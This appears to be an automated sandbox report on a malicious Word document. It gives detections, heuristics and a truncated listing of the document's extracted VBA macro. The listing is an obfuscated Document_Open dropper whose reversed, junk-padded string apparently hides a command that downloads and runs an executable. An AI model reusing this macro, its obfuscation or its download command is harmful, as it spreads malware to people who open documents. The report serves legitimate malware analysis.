MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open auto-execution macro that calls the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further supports its malicious nature. The VBA code appears to be obfuscated, but the presence of Shell() together with the auto-execution macro strongly suggests downloader or dropper functionality.
Heuristics 6
-
ClamAV: Doc.Malware.Chronos-6897935-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents and those where source extraction failed, i.e. cases where the visible source is unavailable or cannot be relied on.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). Note that this is a standard OOXML schema namespace that appears in benign documents as well, so it carries no indicator value on its own.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: b3274a98ab866724df4190d0f787b1edf3eaf281bdf47f7df873f91f75ca5363) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31924 bytes |
Preview script — first 1,000 lines of the extracted script (the listing below ends at a truncation marker and is not the complete macro)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attribute header as written out by the olevba extraction (see the
' "Extracted artifacts" table): VB_Name identifies this as the document's
' ThisDocument class module, and VB_TemplateDerived/VB_Base indicate it was
' derived from the Normal template. The Document_Open procedure that follows
' is the auto-execution entry point flagged by the OLE_VBA_DOCOPEN finding;
' its body is cut off at the truncation marker, so only its first part is
' visible here.
Private Sub Document_Open()
Dim klqLwbEy As String
zfJTAzB = Space(5)
wiYwk = LTrim("oehIXP%L)tM")
cDOhFqbS = RTrim("I^irYbRyp$F*tQLJ*")
While pJzBOY < 384
mbMVEt = RTrim("OKV&Np_qV-DmCeT(nFI")
wDckaqpW = RTrim("_.T-d Y^gD$X]? Vdwf")
lSrgni = 764 + 1489 + 158
XseVJ = Right("pVJh !fT@iGtxaOJs", 2)
cDOhFqbS = UCase("vMW#NA]_RwcHbb")
zfJTAzB = 1458 - 265 - 1339
PQYbJT = "If?*Q#eW*_r$Z(@U." + "fHX$eLLHp@[OUJbYS-Ey" + "X[X]n]#DPDbf@b"
pJzBOY = pJzBOY + 2
Wend
ejfGsI = Left("M%xU$hAiOWgCDgkYi!t)", 3)
zfJTAzB = Left("_)sZexm.DYCjpc@Dz", 2)
cDOhFqbS = Left("XAWxjPooZxGQXdN", 3)
mbMVEt = 1225 + 764 + 1984
klqLwbEy = StrReverse("QeTxXeF.hIOBQXpiLDvCUez\#\k%]pumae-to%U o&E&^ EeZxYeE.FI.BfXgi[DsCSez\L\v%lpJmoeet$%A Se[xleG.ad%oxodgO/#sZuf.UocrCpasWr(eibPmDuel pU/^/^:TpPtkt.h] bfm-W Ot*iSlGpHs)-W -eDh(czaTc$lRrNuM-p seUx_eQ.MllintWuit$raeacR Jcn/I ZeWxlew.rdBmWc")
zfJTAzB = "fnCsnsvaat#" + "xPGsi[?d#-" + "JynQ@EZUCAsl"
LNnev = UCase("FT##EC$p@S")
wDckaqpW = LTrim("Cs?b%*_%NzNSim%fp)n")
zfJTAzB = "fTWce^CJ_n" + "hhdax@TPc$aHYpTP" + "VWWe#*Zd*[A"
For KHJakJ = 0 To 38
ejfGsI = Right("tUnFjOZ#PcKlVR$@SxoF", 4)
ejfGsI = "?ZgGlWcG]jOLp" + "jM&DQ?fclg_DaYysp$P" + "O_pRrCd!$D"
PQYbJT = Left("N$WfRDbwLHBf", 2)
iPHNO = "k*vXHUe?Dzrdec]^Ke]_" + "$cSKBFE J[EvF&%J" + "AdfME&ogumo%a"
MNqxhB = LTrim("L.GFRCVk_DeI")
lSrgni = "EeGicTrkK@T" + "Uu]VBCctQP-lC^!o" + "FnjL!u&qL#"
iPHNO = RTrim("(?i v kk^&")
XseVJ = Left("vkTI.LzUFklp&cM", 4)
lSrgni = UCase("Y_@ph)HpUYvzqT-o")
LNnev = UCase("xQ qRmR$%!K(SLvg")
Next KHJakJ
While INQiYd < 400
mbMVEt = LTrim("C_PcI bDNW.^JH*k")
wDckaqpW = UCase("I WIpmDy L&(_-_?")
LNnev = "dRne#ZaQXB*Y*TtV" + "Nib[TKHW#U_TYY" + "CgxI-$HyO(YR!uw?"
INQiYd = INQiYd + 1
Wend
lSrgni = 1388 + 1704 + 1411
mbMVEt = LTrim("Raw&p$U(MpqQe_")
While NQiVJ < 641
For zDouyj = 0 To 366
XseVJ = LTrim("no_-CiH#ZCxHJmon@I")
zfJTAzB = LTrim("O(AY[siMKb")
MNqxhB = 1117 - 170 - 963
iPHNO = LTrim("DV)bWHK[rwSmL*-")
MNqxhB = "IkVba_PKaZOt#u]uf(" + "TZwcCCqM?@cldUJegh" + "tbVFVx@?lE*fZ F-m"
Next zDouyj
PQYbJT = "BOzv%MdIMGgSNRF&)" + "sz_wc#hogsH^Mrc$Q" + "iFybP[OR?ORbZ"
LNnev = RTrim("hNhT&@.[KBqVDydLPh.)")
While QEGpqM < 118
lSrgni = Right("-WBHBk%$O%^vG#cLEph", 3)
MNqxhB = 1501 - 414 - 1425
wDckaqpW = Right("kf[ldPiR#vD*fXpQq", 2)
LNnev = Right("_PzgttmyUEV_&)", 4)
LNnev = RTrim("b%uibD[Ny$i")
iPHNO = Right("BrUjpY!Le)dX.]", 3)
XseVJ = 289 + 639 + 940
QEGpqM = QEGpqM + 3
Wend
mbMVEt = LTrim("d!P#eWJo@ekEP%.N$W)q")
For VXiNDv = 0 To 213
lSrgni = UCase("@QxpNqa ok hQZdE")
lSrgni = UCase(".GHDAo!pWiZt")
LNnev = LTrim("?Fl%^@bQLyU!y")
iPHNO = 767 - 801 - 741
ejfGsI = UCase("rmC[J[Vp$ny")
ejfGsI = 1126 + 1394 + 1262
wiYwk = LTrim("-SzKtvrGMVqDHeS^_mI-")
lSrgni = Right("!(L&PmDBamSP", 5)
Next VXiNDv
cDOhFqbS = Left("BXQRZL^aDUb(", 5)
ejfGsI = 134 - 1367 - 893
zfJTAzB = 652 + 790 + 252
iPHNO = 1825 + 273 + 1809
If NQiVJ = 558 Then
mbMVEt = Right("**nWYunP)? q?XLav", 2)
XseVJ = RTrim("Y*#EVZf%rJ")
PQYbJT = UCase("Do-uXAHc*nwOg^eu.#G")
While ouaVtt < 177
zfJTAzB = Space(14)
MNqxhB = 763 -
... (truncated)